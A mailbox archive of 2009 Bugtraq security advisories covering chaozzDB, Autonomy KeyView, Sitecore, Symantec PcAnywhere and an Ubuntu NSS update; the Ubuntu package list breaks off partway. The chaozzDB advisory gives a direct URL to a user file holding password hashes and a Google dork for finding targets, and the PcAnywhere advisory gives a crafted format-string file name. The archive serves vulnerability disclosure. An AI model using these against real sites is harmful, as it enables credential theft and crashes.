Description :

chaozzDB is a flatfile database system, which is small and fast. It supports most of the normal SQL-like statements 
(it can insert, delete, update, open and search). It comes with clear and full documentation and a PHP example.

--------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

Critical user.tsv file in db's folder are vulnerable to direct access to view 'critical' information about username and md5hash password from users.


Poc/Exploit:
~~~~~~~~~
http://www.example.com/[chaozzDB_path]/db/user.tsv

Dork:
~~~~~
Google : "chaozzDB 1.2"


Solution:
~~~~~~~

- add .htaccess in db's folder.

Timeline:
~~~~~~~~~

- 14 - 03 - 2009 bug found
- 14 - 03 - 2009 vendor contacted
- 15 - 03 - 2009 vendor response
- 16 - 03 - 2009 advisory release
---------------------------------------------------------------------------

Shoutz:
~~~~~
~ ping - my dearest wife, zizou - my beloved son, i-eyes - my beloved daughter.
~ y3dips,the_day,Negatif,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,
the_hydra,neng chika, str0ke
~ scanners [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
~ SK,Abond,pokley,cybertank, super_temon,whatsoever,b120t0,inggar,fachri,adi,rahmat,indra
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,cyb3rh3b,cR4SH3R,ogeb,bagan,devsheed
~ dr188le,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,ghostblup,shamus,
kuntua, stev_manado,nofry,k1tk4t,0pt1c,k1ngk0ng
~ newbie_hacker@yahoogroups.com
~ milw0rm.com, macaholic.info, unitiga.com, mac.web.id, indowebster.com
~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~~

K-159 || echo|staff || adv[at]e-rdc[dot]org
Homepage: http://www.e-rdc.org/

-------------------------------- [ EOF ] ---------------------------------- 

From - Wed Mar 18 11:21:46 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006ac1
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39787-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 89295EDA19
for <lists@securityspace.com>; Wed, 18 Mar 2009 11:17:36 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 5DB2214383E; Wed, 18 Mar 2009 08:12:17 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 1440 invoked from network); 17 Mar 2009 21:56:20 -0000
Message-ID: <49C01C44.70101@idefense.com>
Date: Tue, 17 Mar 2009 16:55:16 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
User-Agent: Thunderbird 2.0.0.19 (Windows/20081209)
MIME-Version: 1.0
To: vulnwatch@vulnwatch.org, full-disclosure@lists.grok.org.uk,
bugtraq@securityfocus.com
Subject: iDefense Security Advisory 03.17.09: Autonomy KeyView Word Perfect
 File Parsing Buffer Overflow Vulnerability
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Status:   

iDefense Security Advisory 03.17.09
http://labs.idefense.com/intelligence/vulnerabilities/
Mar 17, 2009

I. BACKGROUND

Autonomy KeyView SDK is a commercial SDK that provides many file format
parsing libraries. It supports a large number of different document
formats, one of which is the Word Perfect Document (WPD) format. It is
used by several popular vendors for processing documents. For more
information, visit the URL below.

http://www.autonomy.com/

II. DESCRIPTION

Remote exploitation of a stack-based buffer overflow in Autonomy Inc's
KeyView SDK allows attackers to execute arbitrary code with the
privileges of the current user.

This vulnerability exists within the "wp6sr.dll" which implements the
processing of Word Perfect Documents. When processing certain records,
data is copied from the file into a fixed-size stack buffer without
ensuring that enough space is available. By overflowing the buffer, an
attacker can overwrite control flow structures stored on the stack.

III. ANALYSIS

Exploitation allows attackers to execute arbitrary code with the
privileges of the user. In order to exploit this vulnerability, an
attacker must cause a specially crafted Word Perfect Document to be
processed by an application using the Autonmoy KeyView SDK.

In cases such as Lotus Notes, this requires that an attacker convince a
user to view an e-mail attachment. However, in other cases processing
may take place automatically as a document is examined.

IV. DETECTION

iDefense confirmed that this vulnerability exists within Lotus Notes 8
installed on a Windows XP SP3 machine. All applications which utilize
the Autonomy KeyView SDK to process Word Perfect Documents are
suspected to be vulnerable.

V. WORKAROUND

For Lotus Notes, it is possible to disable the processing of WPD files
by removing, or commenting out, the line referencing "wp6sr.dll" from
the "KeyView.ini" file within the Lotus Notes program directory.
Deleting "wp6sr.dll" from the affected system will also prevent
exploitation.

For Symantec Mail Security, disabling "content filtering" will prevent
exploitation.

Additional workarounds are available from the individual vendors'
advisories referenced below.

VI. VENDOR RESPONSE

IBM Support has released workarounds and a patch which addresses this
issue. For more information, consult their advisory at the following
URL:

http://www-01.ibm.com/support/docview.wss?rsF3&uid=swg21377573

Symantec has released patches which addresses this issue. For more
information, consult their advisory at the following URL:

http://www.symantec.com/avcenter/security/Content/2009.03.17a.html

Autonomy has released a patch which addresses this issue. For more
information, consult their advisory at the following URL:

https://customers.autonomy.com/support/secure/docs/Updates/Keyview/Filter%20SDK/10.4/kv_update_nti40_10.4.zip.readme.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-4564 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

01/14/2008  to IBM & Symantec - 1st notice
11/24/2008  to Autonomy - 1st notice
12/04/2008  From Autonomy - 1st response
12/04/2008  to Autonomy - 2nd notice
12/05/2008  From Autonomy - PoC Request
12/08/2008  to Autonomy - PoC sent
12/09/2008  From Autonomy - PoC Resend Request
12/09/2008  to Autonomy - PoC Resend sent
12/11/2008  From Autonomy - PoC Clarification Request
12/11/2008  to Autonomy - PoC Clarification reply
01/14/2009  From Autonomy - Reset tentative disclosure / patch date
01/14/2009  From Symantec - 1st response
01/19/2009  From IBM - 1st response & PoC Request
01/21/2009  From Autonomy - New proposed tentative disclosure date - End
of February 2009
01/21/2009  From Symantec - Proposed tentative disclosure date -
February 24, 2009
01/30/2009  Multiple vendor coordination status sent
01/30/2009  to IBM - PoC resent
02/05/2009  From IBM - clarification request
02/12/2009  From IBM - clarification request
02/13/2009  to IBM - clarification response
02/18/2009  From IBM - requests PoC clarification
02/19/2009  to IBM - PoC clarification sent
02/23/2009  From Symantec - cross-vendor status request
02/23/2009  to Symantec - cross-vendor status sent
02/27/2009  From IBM - progress report received
02/27/2009  From Symantec - cross-vendor status request
03/02/2009  From IBM - vulnerability confirmed, patch ready
03/10/2009  All vendors agree on March 17, 2009
03/10/2009  From IBM - Proposed tentative date be a Tuesday or Wednesday
03/10/2009  From Symantec - cross-vendor status request
03/10/2009  From Symantec - cross-vendor status request
03/10/2009  Multiple vendor coordination status sent - proposed March
17, 2009 release
03/10/2009  To Symantec - status report sent
03/17/2009  Coordinated Public Disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright � 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

From - Wed Mar 18 11:31:46 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006ac3
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39791-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 03758ECDD5
for <lists@securityspace.com>; Wed, 18 Mar 2009 11:29:22 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 7A4E414395E; Wed, 18 Mar 2009 08:21:14 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 2594 invoked from network); 17 Mar 2009 22:37:55 -0000
Date: Tue, 17 Mar 2009 16:38:05 -0600
Message-Id: <200903172238.n2HMc5rS008726@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: security.assurance@nab.com.au
To: bugtraq@securityfocus.com
Subject: Sitecore .NET 5.3.x - web service information disclosure
Status:   

Title: 
Sitecore web service information disclosure

CVE Identifier:
____________

Credit: 
National Australia Bank's Security Assurance Team.
The vendor was advised of this vulnerability prior to its public release.  National Australia Bank adheres to the �Guidelines for Security Vulnerability Reporting and Response V2.0� document when issuing security advisories.  

Class: 
Information Disclosure
Privilege Escalation

Remote:
Yes

Local:
Yes


Vulnerable:
Sitecore.NET 5.3.1 (rev. 071114) � other versions may also be vulnerable. 

Not Vulnerable:


Vendor:
Sitecore

Discussion:
National Australia Bank's Security Assurance Team have identified a vulnerability in the Visual Sitecore Service, part of the Sitecore CMS application, that allows low privileged users to gain access to administrative and other users� credentials.

Exploit:
No exploit code provided.   Simple SOAP/XML queries are all that is required.

Solution:
Apply patch V5.3.2 rev. 090212


References:  
Vendor Advisory http://sdn5.sitecore.net/Products/Sitecore%20V5/Sitecore%20CMS%205,-d-,3/ReleaseNotes/V5,-d-,3,-d-,2/ChangeLog.aspx




From - Wed Mar 18 11:41:46 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006ac4
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39789-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 8C40DEDA1C
for <lists@securityspace.com>; Wed, 18 Mar 2009 11:34:34 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 0A15F143937; Wed, 18 Mar 2009 08:16:04 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 9201 invoked from network); 18 Mar 2009 04:38:41 -0000
Date: Tue, 17 Mar 2009 22:38:52 -0600
Message-Id: <200903180438.n2I4cqWT022177@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: dh@layereddefense.com
To: bugtraq@securityfocus.com
Subject: Layered Defense Research Advisory: Format String Vulnerablity in
 Symantec PcAnywhere v10-12.5
Status:   

=================================================Layered Defense Research Advisory 17 March 2009 
=================================================1) Affected Product 
Symantec PcAnywhere  version 10 � 12.5
=================================================2) Severity Rating: Low
=================================================3) Description of Vulnerability 
A local format string vulnerability was discovered within Symantec PcAnywhere version 10 thru 12.5 .The vulnerability is due to improper processing of format strings within (.CHF) remote control file names or associated file path . When special crafted format strings are entered as the file name (%s%s%s%s%s.chf) or within the path of the CHF file the format string vulnerability is triggered. Making it possible to read/write arbitrary memory and at a minimum cause a denial of service condition. 
=================================================4) Solution : Upgrade to version 12.5 SP1
=================================================5) Time Table: 
01/06/2009 Reported Vulnerability to Vendor. 
01/08/2008 Vendor acknowledged the vulnerability 
03/17/2008 Vendor published fix

=================================================6) Credits Discovered by Deral Heiland, www.LayeredDefense.com 
=================================================7) Reference
http://www.symantec.com/avcenter/security/Content/2009.03.17.html
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0538
=================================================8) About Layered Defense Layered Defense, Is a group of security professionals that work together on ethical Research, Testing and Training within the information security arena. http://www.layereddefense.com
=================================================
From - Wed Mar 18 11:51:48 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006ac5
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39785-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id AD5F2ED730
for <lists@securityspace.com>; Wed, 18 Mar 2009 11:46:23 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 3A9BF1436E7; Wed, 18 Mar 2009 08:11:31 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 1651 invoked from network); 17 Mar 2009 22:10:47 -0000
Date: Tue, 17 Mar 2009 17:11:30 -0500
From: Jamie Strandboge <jamie@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [USN-740-1] NSS vulnerability
Message-ID: <20090317221130.GD6143@severus.strandboge.com>
Reply-To: Jamie Strandboge <jamie@canonical.com>
MIME-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="NtwzykIc2mflq5ck"
Content-Disposition: inline
User-Agent: Mutt/1.5.18 (2008-05-17)
Status:   


--NtwzykIc2mflq5ck
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

==========================================================Ubuntu Security Notice USN-740-1             March 17, 2009
nss, firefox vulnerability
CVE-2004-2761
==========================================================
A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libnss3                         1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2

Ubuntu 7.10:
  libnss3-0d                      3.11.5-3ubuntu0.7.10.2

Ubuntu 8.04 LTS:
  libnss3-0d                      3.12.0.3-0ubuntu0.8.04.5
  libnss3-1d                      3.12.0.3-0ubuntu0.8.04.5

Ubuntu 8.10:
  libnss3-1d                      3.12.0.3-0ubuntu5.8.10.1

After a standard system upgrade you need to restart your session to
effect the necessary changes.

Details follow:

The MD5 algorithm is known not to be collision resistant. This update
blacklists the proof of concept rogue certificate authority as discussed
in http://www.win.tue.nl/hashclash/rogue-ca/.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2.diff.gz
      Size/MD5:   188837 84bf6c0e34576e50daab0284028533bb
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2.dsc
      Size/MD5:     2389 abbe8becc260777f55315eb565f8d732
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614k.orig.tar.gz
      Size/MD5: 48504132 171958941a2ca0562039add097278245

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/mozilla-firefox_1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_all.deb
      Size/MD5:    53898 025eab1318c7a90e48fb0a927bbbd433
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_all.deb
      Size/MD5:    53014 87135a54ac04ea95a0a3c7dccb8a4d4e

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_amd64.deb
      Size/MD5: 47681092 19a313089bf1da267950c8f5b8d2d2df
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_amd64.deb
      Size/MD5:  2859292 f6a4b48f0e0e3250d83f0bf4183836f7
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_amd64.deb
      Size/MD5:    86270 0bd3983f76c7474d37018f26eee721f4
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_amd64.deb
      Size/MD5:  9494334 91c75d6baf740531224bed258c6622b9
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_amd64.deb
      Size/MD5:   222572 2779237df4dc1c30d8d2c01623eef1e3
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_amd64.deb
      Size/MD5:   166118 862f4a02164840c1d94228a396c2688c
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_amd64.deb
      Size/MD5:   248116 183208d5e43c3ddc117d6cbefc54a472
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_amd64.deb
      Size/MD5:   826574 2ff813a52cac4b3392f056b145129821
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_amd64.deb
      Size/MD5:   218858 2fcc1d909f4fdafaced1b1f737f83bf1

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_i386.deb
      Size/MD5: 44228668 5a244b5b731d0d703cb573e2db10b74b
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_i386.deb
      Size/MD5:  2859256 274033babbff1131a391ca71c19a6e6b
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_i386.deb
      Size/MD5:    78600 3e86ec8d1b73b8f7b822f12aaa56451a
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_i386.deb
      Size/MD5:  7997718 56cb9f85d34aa86721dcc36414b8f0e9
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_i386.deb
      Size/MD5:   222564 14edfb722d08b49930b901114b841c81
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_i386.deb
      Size/MD5:   150606 fa56606c4d002559ee41e965299b523a
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_i386.deb
      Size/MD5:   248106 58139d67e47359f9cb056ad29292d06d
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_i386.deb
      Size/MD5:   717824 ce294179ee0e0fcdea589e751548f04e
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_i386.deb
      Size/MD5:   212058 b3874b6f769aeafedce238b9a15e7b09

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_powerpc.deb
      Size/MD5: 49085684 a4ea3920e8120e9dc7138cf8e8595aa4
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_powerpc.deb
      Size/MD5:  2859352 dac458ed9e848ba8c64d0e18071149f8
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_powerpc.deb
      Size/MD5:    81686 228d420fc876cb95b6edad70d58c2c48
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_powerpc.deb
      Size/MD5:  9113232 7ba2b92dad312ca9d2186dac6380d638
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_powerpc.deb
      Size/MD5:   222564 9e89e2cc261f1c1b43e0b765e140d3d5
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_powerpc.deb
      Size/MD5:   163310 3ddb28abafbffe0943e25f48267df5f1
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_powerpc.deb
      Size/MD5:   248128 94da18de9bba74798a5ae257e85d882b
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_powerpc.deb
      Size/MD5:   817522 eb53d37dea9fce55780abda44b94ca89
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_powerpc.deb
      Size/MD5:   215556 779f90ccb4534487d2274536ac9279dd

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_sparc.deb
      Size/MD5: 45629214 b30a5365e327c4366ae3ea2b393e1d78
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_sparc.deb
      Size/MD5:  2859296 c7f225dc39717d6156b9163c7a8ddda0
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_sparc.deb
      Size/MD5:    80180 51ca826844fa46702feb9bbeb5c6e999
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_sparc.deb
      Size/MD5:  8499070 ee1fd111aa113ac50e5ea42dc85e1e77
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_sparc.deb
      Size/MD5:   222590 6a5621015d57ffbd93f92a8552d98e54
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_sparc.deb
      Size/MD5:   153210 b7c4a9074a678fcaf70a4db7bcb8fd5d
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_sparc.deb
      Size/MD5:   248150 1273ab06f98bf861e4e66985add8685a
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_sparc.deb
      Size/MD5:   728698 cd5ba0f693710a604274d327d4724c88
    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.15~prepatch080614k-0ubuntu2_sparc.deb
      Size/MD5:   213030 fe7a017cd7f4a8a9064372e51f903263

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.11.5-3ubuntu0.7.10.2.diff.gz
      Size/MD5:    23735 2c3b55fe3f316790d2174a56709723ad
    http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.11.5-3ubuntu0.7.10.2.dsc
      Size/MD5:     1925 9d9a2fa42ff8dcb452761d66e3238ef6
    http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.11.5.orig.tar.gz
      Size/MD5:  3696893 1add44e6a41dbf5091cfd000f19ad6b9

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-0d-dbg_3.11.5-3ubuntu0.7.10.2_amd64.deb
      Size/MD5:  3143890 dad0155f293aff8a59d42086cef022c3
    http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-0d_3.11.5-3ubuntu0.7.10.2_amd64.deb
      Size/MD5:   799588 70d491944efd2ce20cb839da11030b0e
    http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.11.5-3ubuntu0.7.10.2_amd64.deb
      Size/MD5:   241342 567c357ea31e0e1729db4738822aa7b0
    http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.11.5-3ubuntu0.7.10.2_amd64.deb
      Size/MD5:   656372 a6868f642b5c295236c7df01dbc3f2d9

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-0d-dbg_3.11.5-3ubuntu0.7.10.2_i386.deb
      Size/MD5:  2995870 d4ea291de433c1768148f35a4f40e596
    http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-0d_3.11.5-3ubuntu0.7.10.2_i386.deb
      Size/MD5:   723166 81b970c37e37b2bfe13bf8edf8b8c2df
    http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.11.5-3ubuntu0.7.10.2_i386.deb
      Size/MD5:   238436 a901d3b0431faa6bfd4d8b732fc6b8ed
    http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.11.5-3ubuntu0.7.10.2_i386.deb
      Size/MD5:   605568 f7a02ba6c2e65c2e3644f81e2e5add33

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/n/nss/libnss3-0d-dbg_3.11.5-3ubuntu0.7.10.2_lpia.deb
      Size/MD5:  3213428 32f032e4c5ebc8383d334e2de5b1e0b5
    http://ports.ubuntu.com/pool/main/n/nss/libnss3-0d_3.11.5-3ubuntu0.7.10.2_lpia.deb
      Size/MD5:   709556 606d9ee62127ecad6620ce6ee2a351c1
    http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.11.5-3ubuntu0.7.10.2_lpia.deb
      Size/MD5:   237148 526eb9b27871cee224d480ce8483d015
    http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.11.5-3ubuntu0.7.10.2_lpia.deb
      Size/MD5:   596394 35c4ef7f97a6934947760236b119d1f1

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-0d-dbg_3.11.5-3ubuntu0.7.10.2_powerpc.deb
      Size/MD5:  3168400 13560d02da9c481147177504476a3f21
    http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-0d_3.11.5-3ubuntu0.7.10.2_powerpc.deb
      Size/MD5:   807892 5a0232d184bb4d87811974d61a902e17
    http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.11.5-3ubuntu0.7.10.2_powerpc.deb
